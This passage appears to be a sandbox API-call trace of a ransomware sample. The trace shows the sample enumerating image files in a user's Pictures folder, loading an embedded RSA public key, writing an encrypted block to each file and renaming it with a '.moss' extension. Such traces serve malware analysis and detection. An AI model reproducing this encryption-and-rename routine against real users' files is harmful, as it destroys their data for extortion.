dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.469] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=50016) returned 1 [0172.469] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.472] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc33a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.472] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.473] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xc360, lpOverlapped=0x0) returned 1 [0172.473] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.474] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.474] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.475] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.475] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.475] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.475] GetLastError () returned 0x0 [0172.475] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.475] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.475] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.475] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.475] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.475] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.476] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.476] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.476] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\qVaGkynXjPMz6RZ0K.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\qvagkynxjpmz6rz0k.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\qVaGkynXjPMz6RZ0K.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\qvagkynxjpmz6rz0k.bmp.moss")) returned 1 [0172.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.477] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.478] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8aa42b0, ftCreationTime.dwHighDateTime=0x1d5df65, ftLastAccessTime.dwLowDateTime=0xd7ca3b50, ftLastAccessTime.dwHighDateTime=0x1d5e510, ftLastWriteTime.dwLowDateTime=0xd7ca3b50, ftLastWriteTime.dwHighDateTime=0x1d5e510, nFileSizeHigh=0x0, nFileSizeLow=0x2b2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Via14eyxpe.jpg", cAlternateFileName="VIA14E~1.JPG")) returned 1 [0172.478] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\Via14eyxpe.jpg") returned=".jpg" [0172.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\Via14eyxpe.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\via14eyxpe.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.478] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=11053) returned 1 [0172.478] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.481] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2b07, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.481] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.482] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x2b2d, lpOverlapped=0x0) returned 1 [0172.482] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.482] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.483] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.483] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.483] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.483] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.483] GetLastError () returned 0x0 [0172.483] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.483] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.483] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.483] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.483] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.483] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.484] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2b2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.484] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.484] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\Via14eyxpe.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\via14eyxpe.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\Via14eyxpe.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\via14eyxpe.jpg.moss")) returned 1 [0172.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.484] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.486] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17dba630, ftCreationTime.dwHighDateTime=0x1d5d9d5, ftLastAccessTime.dwLowDateTime=0x2710f170, ftLastAccessTime.dwHighDateTime=0x1d5dc94, ftLastWriteTime.dwLowDateTime=0x2710f170, ftLastWriteTime.dwHighDateTime=0x1d5dc94, nFileSizeHigh=0x0, nFileSizeLow=0x3b2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X RGlJ65-QWWqSt11jj0.jpg", cAlternateFileName="XRGLJ6~1.JPG")) returned 1 [0172.486] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\X RGlJ65-QWWqSt11jj0.jpg") returned=".jpg" [0172.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\X RGlJ65-QWWqSt11jj0.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\x rglj65-qwwqst11jj0.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.486] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=15146) returned 1 [0172.486] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.489] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3b04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.489] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.489] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.489] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x3b2a, lpOverlapped=0x0) returned 1 [0172.490] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.490] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.491] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.491] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.491] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.491] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.491] GetLastError () returned 0x0 [0172.491] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.491] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.491] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.491] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.491] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.491] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.491] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3b2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.492] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.492] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\X RGlJ65-QWWqSt11jj0.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\x rglj65-qwwqst11jj0.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\X RGlJ65-QWWqSt11jj0.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\x rglj65-qwwqst11jj0.jpg.moss")) returned 1 [0172.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.492] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.494] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.494] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56b66430, ftCreationTime.dwHighDateTime=0x1d5dd9f, ftLastAccessTime.dwLowDateTime=0xd7e8ff10, ftLastAccessTime.dwHighDateTime=0x1d5d7f8, ftLastWriteTime.dwLowDateTime=0xd7e8ff10, ftLastWriteTime.dwHighDateTime=0x1d5d7f8, nFileSizeHigh=0x0, nFileSizeLow=0x7a60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZTxzYddoe.bmp", cAlternateFileName="ZTXZYD~1.BMP")) returned 1 [0172.494] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\ZTxzYddoe.bmp") returned=".bmp" [0172.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\ZTxzYddoe.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\ztxzyddoe.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.494] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=31328) returned 1 [0172.494] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.497] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7a3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.497] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.497] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7a60, lpOverlapped=0x0) returned 1 [0172.497] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.497] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.498] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.498] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.498] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.498] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.498] GetLastError () returned 0x0 [0172.499] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.499] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.499] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.499] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.499] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.499] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.499] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.499] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.499] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.499] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.499] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.500] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\ZTxzYddoe.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\ztxzyddoe.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\ZTxzYddoe.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\ztxzyddoe.bmp.moss")) returned 1 [0172.500] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.500] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.500] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.501] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.501] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56b66430, ftCreationTime.dwHighDateTime=0x1d5dd9f, ftLastAccessTime.dwLowDateTime=0xd7e8ff10, ftLastAccessTime.dwHighDateTime=0x1d5d7f8, ftLastWriteTime.dwLowDateTime=0xd7e8ff10, ftLastWriteTime.dwHighDateTime=0x1d5d7f8, nFileSizeHigh=0x0, nFileSizeLow=0x7a60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZTxzYddoe.bmp", cAlternateFileName="ZTXZYD~1.BMP")) returned 0 [0172.501] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.501] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.501] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46128 | out: hHeap=0xcd0000) returned 1 [0172.501] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd797e0 [0172.501] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xdb6998 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdb6998 | out: hHeap=0xcd0000) returned 1 [0172.502] RtlAllocateHeap 